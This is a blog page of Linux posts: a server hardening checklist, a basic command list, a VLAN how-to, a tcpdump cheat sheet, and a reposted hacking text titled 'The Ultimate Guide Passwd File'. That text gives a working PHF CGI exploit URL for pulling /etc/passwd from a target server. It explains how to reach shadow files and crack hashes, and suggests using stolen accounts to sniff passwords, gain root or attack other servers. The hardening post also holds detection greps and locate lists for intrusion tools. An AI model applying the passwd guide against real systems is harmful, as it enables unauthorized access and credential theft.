How to Secure a Linux Server.

May 25, 2009

How to Secure a Linux Server.

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

   Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104

To modify LogWatch, SSH into server and login as root. At command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account incase you get hacked.

Now scroll down to

Detail = Low

Change that to Medium, or High…

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd

9. Rootkit Hunter

rkhunter:

1. Login to your server via SSH as root. Then Type: cd /usr/local/src/

2. Download RKHunter Version 1.1.4

Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

3. Extract files

Type: tar -xzvf rkhunter-1.1.4.tar.gz

4. Type: cd rkhunter

5. Type: ./installer.sh

6. Lets setup RKHunter to e-mail you you daily scan reports.

Type: pico -w /etc/cron.daily/rkhunter.sh

Add The Following:

1.  !/bin/bash

(/usr/local/bin/rkhunter -c –cronjob 2>&1 | mail -s “RKhunter Scan Details” replace-this@with-your-email.com)

Replace the e-mail above with your e-mail!!

It is best to send the e-mail to an e-mail off-site so that

if the box IS compromised the hacker can’t erase the scan report unless he hacks another server too.

Type: chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

   [root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

51. Check php for register_globals register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

   #!/bin/bash
   #uptime alerti script ..
   UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
   if test $UP -gt 4
   then
   `uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
   fi

89. ignore ping :

1.  iptables -A INPUT -p icmp -j DROP

echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all

vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

              find . -type d -perm 777

91.Check for open ports using nmap command.

92. Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type: /etc/rc.d/init.d/httpd restart

93.Change ssh ListenAddress /etc/ssh/sshd_config

94.PermitRootLogin no

95.Add root login alert

vi .bash_profile

   echo 'ALERT - Root Shell Access on:' `date` `who`
   | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96.Set an SSH Legal Message in /etc/motd

97.Locate.

   locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts

98.Perform some udp and tcp scan here :

http://www.hackerwatch.org/probe/

This site is not bad too : https://grc.com/x/ne.dll?bh0bkyd2

99.Check /var/log/secure , /var/log/messages and other log files of services running to see if there are any issues.

100.Check your box to see if your performance has degraded or if your machine is being over used.

For that, use the commands

vmstat

    Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

    Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

    This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

    Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

    Displays the status of all known processes.

lsof

101. List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

    chmod -R 700 /etc/rc.d/init.d/*
    Use rpm -Va to find out if an rpm is modified
    * Apply security patches to vulnerable software (ie. patch -p1 < patch file)
    * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
    * Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)

102. Install AIDE (Advanced Intrusion Detection Environment) is a free

replacement for Tripwire. = http://www.cs.tut.fi/~rammer/aide.html

103. Testing phase when in production.

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.

        

find /usr/local/apache/domlogs -exec egrep -iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20′ {} \;

Posted in LINUX, Linux Server, SYSTEM UTILITY  |  Leave a Comment »

50 Common Linux Console Commands You Should Learn By Heart

February 11, 2009
  1. clear: Clears the terminal window
  2. ls directory: List contents of a directory
  3. cat filename: Displays the contents of a file in the terminal
  4. rm filename: Removes a file
  5. cp sourcefile detstinationfilename: Copies a file
  6. passwd: Changes password
  7.  motd: Message of the Day
  8. finger username: User information lookup program
  9. startx: Starts an X Window System server
  10. less filename or more filename: Displays the contents of a file in the terminal one page at a time
  11. info: Displays information and documentation on shells, utilities and programs
  12. lpr filename: Sends file to printer
  13. grep string filename: looks through files for strings
  14. head filename: Displays first 10 lines of file
  15. tail filename: Displays last 10 lines of file
  16. mv existingfilename newfilename: Moves or renames file
  17. file filename: Displays information about file contents
  18. echo string: Copies string to terminal
  19. date: Displays current date and time
  20. cal: Displays calendar
  21. gzip filename: Compresses a file
  22. gunzip filename: Decompresses a compressed file
  23. which command: Displays path to command
  24. whereis command: Displays paths to locations of commands
  25. who: Lists currently logged on users
  26. finger username@hostname: Obtains detailed information about a user currently using the system
  27. w: Lists currently logged on users with processing usage
  28. mesg y/n: Sets options for letting other users write you messages
  29. write user: Sends message to other users
  30. talk user: Allows two way chat to other users
  31. chmod permissions filename: Changes file access permissions
  32. mkdir directoryname: Makes a directory
  33. rmdir directoryname: Removes an empty directory
  34. ln existingfile new-link: Creates link to an existing file (hard link)
  35. df: Displays all mounted filesystems
  36. top: Displays updating list of currently running processes
  37. tty: Displays the name of the terminal in which the command was issued
  38. kill PID or %job number: Aborts a process by PID (Process Identification Number) or job number
  39. jobs: Displays a list of current jobs
  40. netstat: Displays network connections
  41. traceroute host: Prints the route packets take to the host
  42. nslookup: Queries Internet domain name servers
  43. hostname: Displays system identity name
  44. rlogin host: Utility to connect to a remote system
  45. telnet host: Utility to connect to a remote system (similar to rlogin but more interactive)
  46. rcp file remotemachine: Used to copy from a remote computer
  47. ftp: Utility to transfer files between systems on a network
  48. rsh command: Utility to run a command on a remote system without logging in
  49. ping host: Utility used to test connection to a remote system
  50. lcd directorypath: Changes local machine directory while logged on to remote machine

Posted in LINUX  |  Leave a Comment »

The Ultimate Guide Passwd File

February 9, 2009

 [***The Ultimate Guide Passwd Files***]

CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________________________________________

1. Introduction

Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one’s fault but your own. Now down to the good stuff [=. 

________________________________________________________

2. What is a Passwd File

A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, so don't start thinking all i have to do is find one and i hit the jackpot. Nope sorry Man, theres alot more to it than that. The passwd file should look something like this

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc

Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc Heres how you read the File

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
Username: rcc 
Encrypted Password: uXDg04UkZgWOQ 
User number: 201 
Group Number: 4 
Real Name (usually): Richard Clark 
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh 

Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for 
anything like ftp, listen, bin, etc., etc. Occasionally 
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root. 
________________________________________________________

3. PHF Exploit

First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to. 
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:

http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd

In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0: 
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing 
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson. 

________________________________________________________________

4. FTP Passwd

The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8/10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
You have gotten one you can crack [=. 
________________________________________________________________

5. Shadowed Passwd's

Now if you happen to find a passwd fiel that looks something like this: "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name

UNIX Paths (Courtesy of 2600) 

UNIX Path Token 
---------------------------------------------------------------- 
AIX 3 /etc/security/passwd ! 
or /tcb/auth/files/<first letter # 
A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter of username> /<username> * SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever 
System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database 
Ultrix 4 /etc/auth[.dir|.pag] * 
UNICOS /etc/udb * Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be. A unshadowing program can be found at http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it. 
________________________________________________________________

6. Crackers

Now that you have gotten a passwd file, what the hell do you do it it to get passwords from it? Thats where crackers come in.
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1 

http://tms.netrom.com/~cassidy/utils/pacec.zip

Many people swear that John the Ripper is the greatest but i have problems with it, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don’t need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps [=. 
___________________________________________________________________________

7. Wordlists 

Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here: ftp://ftp.ox.ac.uk/pub/wordlists/ 
If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with [=. There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked [=. 
____________________________________________________________________________

8. What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.) 
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs [=. Goat

From: Posted in LINUX, Linux Server, SYSTEM UTILITY  |  Leave a Comment »

VLAN ON LINUX

January 28, 2009

Howto: Configure Linux Virtual Local Area Network 

 

VLAN is an acronym for Virtual Local Area Network. Several VLANs can co-exist on a single physical switch, which are configured via software (Linux commands and configuration files) and not through hardware interface (you still need to configure switch).

Hubs or switch connects all nodes in a LAN and node can communicate without a router. For example, all nodes in LAN A can communicate with each other without the need for a router. If a node from LAN A wants to communicate with LAN B node, you need to use a router. Therefore, each LAN (A, B, C and so on) are separated using a router.

VLAN as a name suggest combine multiple LANs at once. But what are the advantages of VLAN?

  • Performance
  • Ease of management
  • Security
  • Trunks
  • You don’t have to configure any hardware device, when physically moving server computer to another location etc.

VLAN concepts and fundamental discussion is beyond the scope of this article. I am reading following textbooks. I found these textbooks extremely useful and highly recommended:

  • Cisco CNNA ICND books (part I and II)
  • Andrew S. Tanenbaum, Computer Networks book

Linux VLAN Configuration Issue

I am lucky enough to get couple of hints from our internal wiki docs :D .

  • Not all network drivers support VLAN. You may need to patch your driver.
  • MTU may be another problem. It works by tagging each frame i.e. an Ethernet header extension that enlarges the header from 14 to 18 bytes. The VLAN tag contains the VLAN ID and priority. See Linux VLAN site for patches and other information.
  • Do not use VLAN ID 1 as it may be used for admin purpose.

Linux VLAN How To

My VLAN ID is 5. So I need to copy file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.5

# cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.5
Now, I’ve one network card (eth0) and it needs to use tagged network traffic for VLAN ID 5.

  • eth0 - Your regular network interface
  • eth0.5 - Your virtual interface that use untagged frames

Do not modify /etc/sysconfig/network-scripts/ifcfg-eth0 file. Now open file /etc/sysconfig/network-scripts/ifcfg-eth0.5 using vi text editor:
# vi /etc/sysconfig/network-scripts/ifcfg-eth0.5
Find DEVICE=ifcfg-eth0line and replace with:
DEVICE=ifcfg-eth0.5
Append line:
VLAN=yes
Also make sure you assign correct IP address using DHCP or static IP. Save the file. Remove gateway entry from all other network config files. Only add gateway to /etc/sysconfig/network file. Save and close the file. Restart network:
# /etc/init.d/network restart
Please note that if you need to configure for VLAN ID 2 then copy the copy file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.2 and do the above procedure again.

Using vconfig command

Above method is perfect and works with Red hat Enterprise Linux / CentOS / Fedora Linux without any problem. However, you will notice that there is a command called vconfig. The vconfig program allows you to create and remove vlan-devices on a vlan enabled kernel. Vlan-devices are virtual ethernet devices which represents the virtual lans on the physical lan.

Please note that this is yet another method of configuring VLAN. If you are happy with above method no need to read below.

Add VLAN ID 5 with follwing command for eth0:
# vconfig add eth0 5

The vconfig add command creates a vlan-device on eth0 which result into eth0.5 interface. You can use normal ifconfig command to see device information:
# ifconfig eth0.5
Use ifconfig to assign IP address to vlan interfere :
# ifconfig eth0.5 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 up
Get detailed information about VLAN interface:
# cat /proc/net/vlan/eth0.5
If you wish to delete VLAN interface delete command:
# ifconfig eth0.5 down
# vconfig rem eth0.5

A VLAN is a “Virtual Local Area Network” and is present in L2 (Level 2) of the protocal stack.

A host may be a server, workstation or other device which conforms to 802.1q specification. Therefore, it is possible (with certain limitations) to attach a laptop to a VLAN seen by a server.

802.1q provides for an additional 4-bytes of information added to the L2 frame, 12 bits of which indicate the VLAN is. Thus one may have 4K VLANs.

When you want to configure a VLAN in Linux, assuming your kernel supports it (2.6+ do) you need to make sure 802.1q support is available. This is most easily done with modprobe. So the command:

/sbin/modprobe 8021q

should do the trick.

Then, for any given NIC interface you only have to do the following:

/sbin/vconfig add eth
/sbin/ifconfig eth. 192.168.0.x netmask 255.255.255.0

Of course I just picked some arbitrary class C address, you would have to use what is appropriate for you.

You may need then to add to the routing table (not knowing what Linux you are running) something like:

/sbin/route add -net 192.168.0.0 netmask 255.255.255.0 eth.

ALL THE ABOVE MUST BE AS ROOT.

Virtual LAN configuration

You can create a VLAN on Linux by executing the following commands:
vconfig add
ifconfig . netmask
ifconfig . up

For example:
vconfig add eth0 6
ifconfig eth0.5 192.168.1.6 netmask 255.255.255.0
ifconfig eth0.6 up

You can view the traffic of that VLAN by executing the following command:

cat /proc/net/vlan/eth0.6

like you can configure 2048 VLANs for one physical interface.

Advantages of VLANs

VLANs provide a number of benefits to a network designer. The first advantage is the number of devices required to implement a given network topology can be reduced. Without VLANs, if your network design requires ten machines divided into five different LANs, you would need five different switches or hubs, and most of the ports would be wasted. With VLANs, this work could be done with one device.

Most routers and standard computers can support a limited number of physical network interfaces. Although dual and quad-port Ethernet adapters are available, these are expensive. For example, a quad-port Ethernet card may cost $400. VLAN capable switches start at around $500, but they support many more interfaces.

Depending on the scenario, VLANs and trunks can provide an effective way of segmenting a network without the expense and complexity of managing many physical interfaces.

 

Posted in LINUX, Linux Server  |  Tags: ,  |  Leave a Comment »

TCPDUMP MANUAL

December 20, 2008
  • Basic communication // see the basics without many options
    # tcpdump -nS
  • Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help
    # tcpdump -nnvvS
  • A deeper look at the traffic // adds -X for payload but doesn’t grab any more of the packet
    # tcpdump -nnvvXS
  • Heavy packet viewing // the final “s” increases the snaplength, grabbing the whole packet
    # tcpdump -nnvvXSs 1514

 

 

Recipes

 

  1. host // look for traffic based on IP address (also works with hostname if you’re not using -n)
    # tcpdump host 1.2.3.4
  2. src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
    # tcpdump src 2.3.4.5
    # tcpdump dst 3.4.5.6
  3. net // capture an entire network using CIDR notation
    # tcpdump net 1.2.3.0/24
  4. proto // works for tcp, udp, and icmp. Note that you don’t have to type proto
    # tcpdump icmp
  5. port // see only traffic to or from a certain port
    # tcpdump port 3389
  6. src, dst port // filter based on the source or destination port
    # tcpdump src port 1025
    # tcpdump dst port 3389

TCP traffic from 10.5.2.3 destined for port 3389:
# tcpdump tcp and src 10.5.2.3 and dst port 3389

Traffic originating from the 192.168 network headed for the 10 or 172.16 networks:
# tcpdump src net 192.168.0.0/16 and dst net 10.0.0.0/8 or 172.16.0.0/16

Non-ICMP traffic destined for 192.168.0.2 from the 172.16 network:
# tcpdump dst 192.168.0.2 and src net 172.16.0.0/16 and not icmp

Traffic originating from Mars or Pluto that isn’t to the SSH port:
# tcpdump -vv src mars or pluto and not dst port 22

Traffic that’s from 10.0.2.4 AND destined for ports 3389 or 22:
# tcpdump 'src 10.0.2.4 and \(dst port 3389 or 22\)'

Show me all URG packets:
# tcpdump 'tcp[13] & 32 != 0'

Show me all ACK packets:
# tcpdump 'tcp[13] & 16 != 0'

Show me all PSH packets:
# tcpdump 'tcp[13] & 8 != 0'

Show me all RST packets:
# tcpdump 'tcp[13] & 4 != 0'

Show me all SYN packets:
# tcpdump 'tcp[13] & 2 != 0'

Show me all FIN packets:
# tcpdump 'tcp[13] & 1 != 0'

Show me all SYN-ACK packets:
# tcpdump 'tcp[13] = 18'

 

Display all IPv6 Traffic:

# tcpdump ip6

  • Show all traffic with both SYN and RST flags set: (should never happen)# tcpdump ‘tcp[13] = 6′
  • Show all traffic with the “evil bit” set:# tcpdump ‘ip[6] & 128 != 0′

    • Posted in LINUX, SYSTEM UTILITY  |  Leave a Comment »

    Previous Entries